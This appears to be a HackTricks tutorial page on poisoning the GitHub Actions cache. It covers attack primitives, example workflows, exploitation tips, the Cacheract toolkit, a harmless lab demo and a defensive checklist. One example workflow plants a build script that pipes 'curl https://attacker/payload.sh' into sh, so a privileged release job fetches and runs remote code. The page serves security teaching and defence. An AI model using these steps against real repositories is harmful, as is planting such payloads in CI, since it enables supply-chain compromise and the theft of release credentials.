GH Actions - Cache Poisoning

[!TIP] Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Overview

The GitHub Actions cache is global to a repository. Any workflow that knows a cache key (or restore-keys) can populate that entry, even if the job only has permissions: contents: read. GitHub does not segregate caches by workflow, event type, or trust level, so an attacker who compromises a low-privilege job can poison a cache that a privileged release job will later restore. This is how the Ultralytics compromise pivoted from a pull_request_target workflow into the PyPI publishing pipeline.

Attack primitives

  • actions/cache exposes both restore and save operations (actions/cache@v4, actions/cache/save@v4, actions/cache/restore@v4). The save call is allowed for any job except truly untrusted pull_request workflows triggered from forks.
  • Cache entries are identified solely by the key. Broad restore-keys make it easy to inject payloads because the attacker only needs to collide with a prefix.
  • Cache keys and versions are client-specified values; the cache service does not validate that a key/version matches a trusted workflow or cache path.
  • The cache server URL + runtime token are long-lived relative to the workflow (historically ~6 hours, now ~90 minutes) and are not user-revocable. As of late 2024 GitHub blocks cache writes after the originating job completes, so attackers must write while the job is still running or pre-poison future keys.
  • The cached filesystem is restored verbatim. If the cache contains scripts or binaries that are executed later, the attacker controls that execution path.
  • The cache file itself is not validated on restore; it is just a zstd-compressed archive, so a poisoned entry can overwrite scripts, package.json, or other files under the restore path.

Example exploitation chain

Author workflow (pull_request_target) poisoned the cache:

steps:
  - run: |
      mkdir -p toolchain/bin
      printf '#!/bin/sh\ncurl https://attacker/payload.sh | sh\n' > toolchain/bin/build
      chmod +x toolchain/bin/build
  - uses: actions/cache/save@v4
    with:
      path: toolchain
      key: linux-build-${{ hashFiles('toolchain.lock') }}

Privileged workflow restored and executed the poisoned cache:

steps:
  - uses: actions/cache/restore@v4
    with:
      path: toolchain
      key: linux-build-${{ hashFiles('toolchain.lock') }}
  - run: toolchain/bin/build release.tar.gz

The second job now runs attacker-controlled code while holding release credentials (PyPI tokens, PATs, cloud deploy keys, etc.).

Poisoning mechanics

GitHub Actions cache entries are typically zstd-compressed tar archives. You can craft one locally and upload it to the cache:

tar --zstd -cf poisoned_cache.tzstd cache/contents/here

On a cache hit, the restore action will extract the archive as-is. If the cache path includes scripts or config files that are executed later (build tooling, action.yml, package.json, etc.), you can overwrite them to gain execution.

Practical exploitation tips

  • Target workflows triggered by pull_request_target, issue_comment, or bot commands that still save caches; GitHub lets them overwrite repository-wide keys even when the runner only has read access to the repo.
  • Look for deterministic cache keys reused across trust boundaries (for example, pip-${{ hashFiles('poetry.lock') }}) or permissive restore-keys, then save your malicious tarball before the privileged workflow runs.
  • Monitor logs for Cache saved entries or add your own cache-save step so the next release job restores the payload and executes the trojanized scripts or binaries.

Newer techniques seen in the Angular (2026) chain

  • Cache v2 "prefix hit" behavior: In Cache v2, exact misses can still restore another entry sharing the same key prefix (effectively "all keys are restore keys"). Attackers can pre-seed near-collision keys so a future miss falls back to the poisoned object.
  • Forced eviction in one run: Since November 20, 2025, GitHub evicts entries immediately when repository cache usage exceeds the limit (10 GB by default). An attacker can upload junk cache data first, evict legitimate entries during the same job, and then write the malicious cache key without waiting for a daily cleanup cycle.
  • setup-node cache pivots via reusable actions: Reusable/internal actions that wrap actions/setup-node with cache-dependency-path can silently bridge low-trust and high-trust workflows. If both paths hash to shared keys, poisoning the dependency cache can execute in privileged automation (for example Renovate/bot jobs).
  • Chaining cache poisoning into bot-driven supply chain abuse: In the Angular case, cache poisoning exposed a bot PAT, which was then usable to force-push bot-owned PR heads after approval. If approval-reset rules exempt bot actors, this enables swapping reviewed commits for malicious ones (for example imposter action SHAs) before merge.

##å Cacheract

Cacheract is a PoC-focused toolkit for GitHub Actions cache poisoning in authorized testing. The practical value is that it automates the fragile parts that are easy to get wrong manually:

  • Detect and use runtime cache context from the runner (ACTIONS_RUNTIME_TOKEN and cache service URL).
  • Enumerate and target candidate cache keys/versions used by downstream workflows.
  • Force eviction by overfilling cache quota (when applicable) and then writing attacker-controlled entries in the same run.
  • Seed poisoned cache content so later workflows restore and execute modified tooling.

This is especially useful in Cache v2 environments where timing and key/version behavior matter more than in early cache implementations.

Demo

Use this only in repositories you own or are explicitly allowed to test.

1. Vulnerable workflow (untrusted trigger can save cache)

This workflow simulates a pull_request_target anti-pattern: it writes cache content from attacker-controlled context and saves it under a deterministic key.

name: untrusted-cache-writer
on:
  pull_request_target:
    types: [opened, synchronize, reopened]

permissions:
  contents: read

jobs:
  poison:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Build "toolchain" from untrusted context (demo)
        run: |
          mkdir -p toolchain/bin
          cat > toolchain/bin/build << 'EOF'
          #!/usr/bin/env bash
          echo "POISONED_BUILD_PATH"
          echo "workflow=${GITHUB_WORKFLOW}" > /tmp/cache-poisoning-demo.txt
          EOF
          chmod +x toolchain/bin/build
      - uses: actions/cache/save@v4
        with:
          path: toolchain
          key: linux-build-${{ hashFiles('toolchain.lock') }}

2. Privileged workflow (restores and executes cached binary/script)

This workflow restores the same key and executes toolchain/bin/build while holding a dummy secret. If poisoned, execution path is attacker-controlled.

name: privileged-consumer
on:
  workflow_dispatch:

permissions:
  contents: read

jobs:
  release_like_job:
    runs-on: ubuntu-latest
    env:
      DEMO_SECRET: ${{ secrets.DEMO_SECRET }}
    steps:
      - uses: actions/cache/restore@v4
        with:
          path: toolchain
          key: linux-build-${{ hashFiles('toolchain.lock') }}
      - name: Execute cached build tool
        run: |
          ./toolchain/bin/build
          test -f /tmp/cache-poisoning-demo.txt && echo "Poisoning confirmed"

3. Run the lab

  • Add a stable toolchain.lock file so both workflows resolve the same cache key.
  • Trigger untrusted-cache-writer from a test PR.
  • Trigger privileged-consumer via workflow_dispatch.
  • Confirm POISONED_BUILD_PATH appears in logs and /tmp/cache-poisoning-demo.txt is created.

4. What this demonstrates technically

  • Cross-workflow cache trust break: The writer and consumer workflows do not share trust level, but they share cache namespace.
  • Execution-on-restore risk: No integrity validation is performed before executing a restored script/binary.
  • Deterministic key abuse: If a high-trust job uses predictable keys, a low-trust job can preposition malicious content.

5. Defensive verification checklist

  • Split keys by trust boundary (pr-, ci-, release-) and avoid shared prefixes.
  • Disable cache writes in untrusted workflows.
  • Hash/verify restored executable content before running it.
  • Avoid executing tools directly from cache paths.

References

[!TIP] Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks